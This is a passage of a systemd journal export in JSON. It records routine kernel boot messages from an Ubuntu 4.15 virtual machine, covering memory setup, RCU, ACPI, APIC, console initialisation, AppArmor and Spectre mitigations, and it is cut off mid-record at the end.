"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=70;b=e2b08827b5804427b422c10c84f1567e;m=55861f;t=5bd16dd190587;x=4af90f064f9bfc08", "__REALTIME_TIMESTAMP" : "1615280779888007", "__MONOTONIC_TIMESTAMP" : "5604895", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "KVM setup async PF for cpu 0" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=71;b=e2b08827b5804427b422c10c84f1567e;m=558628;t=5bd16dd190590;x=62d11143cd575a88", "__REALTIME_TIMESTAMP" : "1615280779888016", "__MONOTONIC_TIMESTAMP" : "5604904", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "kvm-stealtime: cpu 0, msr 7fc24040" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=72;b=e2b08827b5804427b422c10c84f1567e;m=558631;t=5bd16dd190599;x=1cc3c8a9c9dd7901", "__REALTIME_TIMESTAMP" : "1615280779888025", "__MONOTONIC_TIMESTAMP" : "5604913", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "Built 1 zonelists, mobility grouping on. Total pages: 515941" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=73;b=e2b08827b5804427b422c10c84f1567e;m=55863a;t=5bd16dd1905a1;x=e8caf151eb66e06b", "__REALTIME_TIMESTAMP" : "1615280779888033", "__MONOTONIC_TIMESTAMP" : "5604922", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "Policy zone: DMA32" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=74;b=e2b08827b5804427b422c10c84f1567e;m=558646;t=5bd16dd1905ae;x=b008d01b5689d4df", "__REALTIME_TIMESTAMP" : "1615280779888046", "__MONOTONIC_TIMESTAMP" : "5604934", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "MESSAGE" : "Kernel command line: BOOT_IMAGE=/boot/vmlinuz-4.15.0-60-generic root=LABEL=cloudimg-rootfs ro console=tty1 console=ttyS0" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=75;b=e2b08827b5804427b422c10c84f1567e;m=558653;t=5bd16dd1905ba;x=258fad1740261764", "__REALTIME_TIMESTAMP" : "1615280779888058", "__MONOTONIC_TIMESTAMP" : "5604947", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "Calgary: detecting Calgary via BIOS EBDA area" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=76;b=e2b08827b5804427b422c10c84f1567e;m=55865c;t=5bd16dd1905c3;x=7d6fd6818753d72d", "__REALTIME_TIMESTAMP" : "1615280779888067", "__MONOTONIC_TIMESTAMP" : "5604956", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "MESSAGE" : "Calgary: Unable to locate Rio Grande table in EBDA - bailing!" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=77;b=e2b08827b5804427b422c10c84f1567e;m=55866d;t=5bd16dd1905d4;x=5a5325e226ebce28", "__REALTIME_TIMESTAMP" : "1615280779888084", "__MONOTONIC_TIMESTAMP" : "5604973", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "Memory: 2015744K/2096616K available (12300K kernel code, 2481K rwdata, 4172K rodata, 2436K init, 2384K bss, 80872K reserved, 0K cma-reserved)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=78;b=e2b08827b5804427b422c10c84f1567e;m=558679;t=5bd16dd1905e0;x=dff864ad4aaca487", "__REALTIME_TIMESTAMP" : "1615280779888096", "__MONOTONIC_TIMESTAMP" : "5604985", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "SLUB: HWalign=64, Order=0-3, MinObjects=0, CPUs=1, Nodes=1" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=79;b=e2b08827b5804427b422c10c84f1567e;m=558682;t=5bd16dd1905ea;x=dc4b1bb083f70bbb", "__REALTIME_TIMESTAMP" : "1615280779888106", "__MONOTONIC_TIMESTAMP" : "5604994", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "Kernel/User page tables isolation: enabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=7a;b=e2b08827b5804427b422c10c84f1567e;m=55868c;t=5bd16dd1905f3;x=ebb66b6d607ac266", "__REALTIME_TIMESTAMP" : "1615280779888115", "__MONOTONIC_TIMESTAMP" : "5605004", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_SOURCE_MONOTONIC_TIMESTAMP" : "0", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "MESSAGE" : "ftrace: allocating 39306 entries in 154 pages" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=7b;b=e2b08827b5804427b422c10c84f1567e;m=558695;t=5bd16dd1905fd;x=25b7cc341a5cb139", "__REALTIME_TIMESTAMP" : "1615280779888125", "__MONOTONIC_TIMESTAMP" : "5605013", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "4000", "MESSAGE" : "Hierarchical RCU implementation." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=7c;b=e2b08827b5804427b422c10c84f1567e;m=5586a0;t=5bd16dd190607;x=a8784248f36b171c", "__REALTIME_TIMESTAMP" : "1615280779888135", "__MONOTONIC_TIMESTAMP" : "5605024", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "4000", "MESSAGE" : "\u0009RCU restricting CPUs from NR_CPUS=8192 to nr_cpu_ids=1." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=7d;b=e2b08827b5804427b422c10c84f1567e;m=5586a9;t=5bd16dd190611;x=17cad42f92f96745", "__REALTIME_TIMESTAMP" : "1615280779888145", "__MONOTONIC_TIMESTAMP" : "5605033", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "4000", "MESSAGE" : "\u0009Tasks RCU enabled." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=7e;b=e2b08827b5804427b422c10c84f1567e;m=5586b3;t=5bd16dd19061a;x=778621a60a8168", "__REALTIME_TIMESTAMP" : "1615280779888154", "__MONOTONIC_TIMESTAMP" : "5605043", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "4000", "MESSAGE" : "RCU: Adjusting geometry for rcu_fanout_leaf=16, nr_cpu_ids=1" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=7f;b=e2b08827b5804427b422c10c84f1567e;m=5586bc;t=5bd16dd190623;x=b92fdbd20060c1c5", "__REALTIME_TIMESTAMP" : "1615280779888163", "__MONOTONIC_TIMESTAMP" : "5605052", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "4000", "MESSAGE" : "NR_IRQS: 524544, nr_irqs: 256, preallocated irqs: 16" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=80;b=e2b08827b5804427b422c10c84f1567e;m=5586c5;t=5bd16dd19062c;x=b490850fd15c6fe2", "__REALTIME_TIMESTAMP" : "1615280779888172", "__MONOTONIC_TIMESTAMP" : "5605061", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "4000", "MESSAGE" : "Console: colour VGA+ 80x25" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=81;b=e2b08827b5804427b422c10c84f1567e;m=5586dd;t=5bd16dd190644;x=90cdd9c6a302efe4", "__REALTIME_TIMESTAMP" : "1615280779888196", "__MONOTONIC_TIMESTAMP" : "5605085", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "4000", "MESSAGE" : "console [tty1] enabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=82;b=e2b08827b5804427b422c10c84f1567e;m=5586e6;t=5bd16dd19064d;x=710e7e5bf1ae139d", "__REALTIME_TIMESTAMP" : "1615280779888205", "__MONOTONIC_TIMESTAMP" : "5605094", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "4000", "MESSAGE" : "console [ttyS0] enabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=83;b=e2b08827b5804427b422c10c84f1567e;m=5586f1;t=5bd16dd190659;x=b0d667d63ba34732", "__REALTIME_TIMESTAMP" : "1615280779888217", "__MONOTONIC_TIMESTAMP" : "5605105", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "4000", "MESSAGE" : "ACPI: Core revision 20170831" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=84;b=e2b08827b5804427b422c10c84f1567e;m=5586fa;t=5bd16dd190662;x=92661cfbe6db2a18", "__REALTIME_TIMESTAMP" : "1615280779888226", "__MONOTONIC_TIMESTAMP" : "5605114", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "4000", "MESSAGE" : "ACPI: 1 ACPI AML tables successfully acquired and loaded" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=85;b=e2b08827b5804427b422c10c84f1567e;m=558703;t=5bd16dd19066a;x=d6d886985107b215", "__REALTIME_TIMESTAMP" : "1615280779888234", "__MONOTONIC_TIMESTAMP" : "5605123", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "4012", "MESSAGE" : "APIC: Switch to symmetric I/O mode setup" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=86;b=e2b08827b5804427b422c10c84f1567e;m=55870c;t=5bd16dd190673;x=a1961cb49536ff59", "__REALTIME_TIMESTAMP" : "1615280779888243", "__MONOTONIC_TIMESTAMP" : "5605132", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "6594", "MESSAGE" : "x2apic enabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=87;b=e2b08827b5804427b422c10c84f1567e;m=558715;t=5bd16dd19067d;x=4c6f848de3d9c0ee", "__REALTIME_TIMESTAMP" : "1615280779888253", "__MONOTONIC_TIMESTAMP" : "5605141", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "8004", "MESSAGE" : "Switched APIC routing to physical x2apic." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=88;b=e2b08827b5804427b422c10c84f1567e;m=55871f;t=5bd16dd190686;x=f1b82f3ef3a09e2b", "__REALTIME_TIMESTAMP" : "1615280779888262", "__MONOTONIC_TIMESTAMP" : "5605151", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "12682", "MESSAGE" : "..TIMER: vector=0x30 apic1=0 pin1=2 apic2=-1 pin2=-1" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=89;b=e2b08827b5804427b422c10c84f1567e;m=558728;t=5bd16dd19068f;x=7bc3ec2567970a35", "__REALTIME_TIMESTAMP" : "1615280779888271", "__MONOTONIC_TIMESTAMP" : "5605160", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "15744", "MESSAGE" : "tsc: Detected 2099.990 MHz processor" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=8a;b=e2b08827b5804427b422c10c84f1567e;m=558734;t=5bd16dd19069c;x=e94f89dba5e05079", "__REALTIME_TIMESTAMP" : "1615280779888284", "__MONOTONIC_TIMESTAMP" : "5605172", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "16012", "MESSAGE" : "Calibrating delay loop (skipped) preset value.. 4199.98 BogoMIPS (lpj=8399960)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=8b;b=e2b08827b5804427b422c10c84f1567e;m=55873d;t=5bd16dd1906a5;x=adc6f086387cee55", "__REALTIME_TIMESTAMP" : "1615280779888293", "__MONOTONIC_TIMESTAMP" : "5605181", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "20003", "MESSAGE" : "pid_max: default: 32768 minimum: 301" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=8c;b=e2b08827b5804427b422c10c84f1567e;m=558746;t=5bd16dd1906ae;x=141973390bbbd033", "__REALTIME_TIMESTAMP" : "1615280779888302", "__MONOTONIC_TIMESTAMP" : "5605190", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "24037", "MESSAGE" : "Security Framework initialized" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=8d;b=e2b08827b5804427b422c10c84f1567e;m=558752;t=5bd16dd1906b9;x=f69cac992562d9c6", "__REALTIME_TIMESTAMP" : "1615280779888313", "__MONOTONIC_TIMESTAMP" : "5605202", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "26234", "MESSAGE" : "Yama: becoming mindful." } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=8e;b=e2b08827b5804427b422c10c84f1567e;m=55875b;t=5bd16dd1906c3;x=a5e24fb83560b6c7", "__REALTIME_TIMESTAMP" : "1615280779888323", "__MONOTONIC_TIMESTAMP" : "5605211", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "28043", "MESSAGE" : "AppArmor: AppArmor initialized" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=8f;b=e2b08827b5804427b422c10c84f1567e;m=558764;t=5bd16dd1906cc;x=6c308ef50c3a5d50", "__REALTIME_TIMESTAMP" : "1615280779888332", "__MONOTONIC_TIMESTAMP" : "5605220", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "32056", "MESSAGE" : "Dentry cache hash table entries: 262144 (order: 9, 2097152 bytes)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=90;b=e2b08827b5804427b422c10c84f1567e;m=55876e;t=5bd16dd1906d5;x=b89ec68ac8b48021", "__REALTIME_TIMESTAMP" : "1615280779888341", "__MONOTONIC_TIMESTAMP" : "5605230", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "36034", "MESSAGE" : "Inode-cache hash table entries: 131072 (order: 8, 1048576 bytes)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=91;b=e2b08827b5804427b422c10c84f1567e;m=558777;t=5bd16dd1906de;x=d5cbd363193285fd", "__REALTIME_TIMESTAMP" : "1615280779888350", "__MONOTONIC_TIMESTAMP" : "5605239", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "39434", "MESSAGE" : "Mount-cache hash table entries: 4096 (order: 3, 32768 bytes)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=92;b=e2b08827b5804427b422c10c84f1567e;m=558780;t=5bd16dd1906e7;x=fa98366b38acd874", "__REALTIME_TIMESTAMP" : "1615280779888359", "__MONOTONIC_TIMESTAMP" : "5605248", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "40006", "MESSAGE" : "Mountpoint-cache hash table entries: 4096 (order: 3, 32768 bytes)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=93;b=e2b08827b5804427b422c10c84f1567e;m=558789;t=5bd16dd1906f0;x=3f1c170ea1e6bf54", "__REALTIME_TIMESTAMP" : "1615280779888368", "__MONOTONIC_TIMESTAMP" : "5605257", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "44336", "MESSAGE" : "Last level iTLB entries: 4KB 0, 2MB 0, 4MB 0" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=94;b=e2b08827b5804427b422c10c84f1567e;m=558792;t=5bd16dd1906f9;x=cf6fcc04e36b3efb", "__REALTIME_TIMESTAMP" : "1615280779888377", "__MONOTONIC_TIMESTAMP" : "5605266", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "48003", "MESSAGE" : "Last level dTLB entries: 4KB 0, 2MB 0, 4MB 0, 1GB 0" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=95;b=e2b08827b5804427b422c10c84f1567e;m=55879b;t=5bd16dd190703;x=58189c75c4c81c80", "__REALTIME_TIMESTAMP" : "1615280779888387", "__MONOTONIC_TIMESTAMP" : "5605275", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "52004", "MESSAGE" : "Spectre V1 : Mitigation: usercopy/swapgs barriers and __user pointer sanitization" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=96;b=e2b08827b5804427b422c10c84f1567e;m=5587b5;t=5bd16dd19071d;x=ef7fdd149e9c0257", "__REALTIME_TIMESTAMP" : "1615280779888413", "__MONOTONIC_TIMESTAMP" : "5605301", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "56003", "MESSAGE" : "Spectre V2 : Mitigation: Full generic retpoline" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=97;b=e2b08827b5804427b422c10c84f1567e;m=5587e2;t=5bd16dd19074a;x=89029417d35b153e", "__REALTIME_TIMESTAMP" : "1615280779888458", "__MONOTONIC_TIMESTAMP" : "5605346", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "58337", "MESSAGE" : "Spectre V2 : Spectre v2 / SpectreRSB mitigation: Filling RSB on context switch" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=98;b=e2b08827b5804427b422c10c84f1567e;m=5587ed;t=5bd16dd190755;x=a1c31d80f87bf9a1", "__REALTIME_TIMESTAMP" : "1615280779888469", "__MONOTONIC_TIMESTAMP" : "5605357", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", 